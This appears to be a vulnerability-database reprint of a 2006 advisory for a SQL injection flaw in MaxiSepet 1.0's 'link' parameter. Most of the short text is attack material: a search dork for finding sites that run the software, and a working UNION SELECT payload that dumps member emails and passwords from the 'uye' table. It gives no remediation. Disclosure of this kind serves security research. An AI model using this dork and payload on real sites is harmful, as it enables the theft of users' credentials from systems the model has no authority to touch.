Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13102
HistoryJun 12, 2006 - 12:00 a.m.

MaxiSepet <= 1.0 (link) SQL Injection Vulnerability

2006-06-1200:00:00
vulners.com
54

#Method found by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet �"

#How: Parameter link did not sanitized properly.

#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&amp;link=SQL

#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&amp;link=-1+UNION+SELECT+concat&#40;&#39;&#65533;ye&#37;20adi:&#37;20&lt;b&gt;&#39;,email,&#39;&lt;/b&gt;&lt;br&gt;&#39;,&#39;&#65533;ifre:&#37;20&lt;b&gt;&#39;,sifre,&#39;&lt;/b&gt;&#39;&#41;+from+uye+ORDER BY email ASC

nukedx.com [2006-06-11]